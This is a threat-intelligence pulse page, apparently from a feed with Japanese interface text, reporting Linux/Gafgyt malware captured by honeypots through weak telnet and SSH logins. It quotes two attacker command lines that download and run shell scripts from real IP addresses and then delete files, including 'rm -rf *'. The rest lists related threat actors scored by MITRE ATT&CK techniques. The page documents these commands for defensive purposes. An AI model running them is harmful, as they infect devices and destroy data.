Linux/Gafgyt Malware
概要
Detected by honeypots
Via telnet logins with weak passwords
Commands:
cd /tmp; wget http://23.94.47.60/gtop.sh || curl -O http://23.94.47.60/gtop.sh; chmod 777 gtop.sh; sh gtop.sh; busybox tftp 23.94.47.60 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; busybox tftp -r tftp2.sh -g 23.94.47.60; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf gtop.sh tftp1.sh tftp2.sh;exit
/bin/busybox;echo -e '\147\141\171\146\147\164'
Via SSH login:
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://163.172.186.66/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 163.172.186.66 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 163.172.186.66; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 163.172.186.66 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *
Created: 2026-02-23
Indicators
Indicatorsは見つかっていない。
類似Pulses
このPulseに関連する脅威アクター (事実ベース)
Score: 4.34
Matched TTPs:
- T1059.004 - Unix Shell
- T1556.005 - Reversible Encryption
MITREへのリンク →
Score: 4.34
Matched TTPs:
- T1059.004 - Unix Shell
- T1556.005 - Reversible Encryption
MITREへのリンク →
Score: 4.54
Matched TTPs:
- T1218.009 - Regsvcs/Regasm
MITREへのリンク →
Score: 5.32
Matched TTPs:
- T1556.005 - Reversible Encryption
- T1055.005 - Thread Local Storage
MITREへのリンク →
Score: 5.32
Matched TTPs:
- T1556.005 - Reversible Encryption
- T1055.005 - Thread Local Storage
MITREへのリンク →
Score: 4.54
Matched TTPs:
- T1651 - Cloud Administration Command
MITREへのリンク →
このPulseに関連する脅威アクター (推論ベース)
Score: 0.76
Matched TTPs:
- T1556.005 - Reversible Encryption
- T1055.005 - Thread Local Storage
MITREへのリンク →
Score: 0.75
Matched TTPs:
- T1556.005 - Reversible Encryption
- T1055.005 - Thread Local Storage
MITREへのリンク →
Score: 0.68
Matched TTPs:
- T1651 - Cloud Administration Command
MITREへのリンク →
Score: 0.66
Matched TTPs:
- T1556.005 - Reversible Encryption
- T1059.004 - Unix Shell
MITREへのリンク →
Score: 0.65
Matched TTPs:
- T1218.009 - Regsvcs/Regasm
MITREへのリンク →
Score: 0.64
Matched TTPs:
- T1556.005 - Reversible Encryption
- T1059.004 - Unix Shell
MITREへのリンク →
Related CVEs
このPulseに見つかったCVEはありません。
Pulse – 脅威アクター グラフ
← Pulse一覧に戻る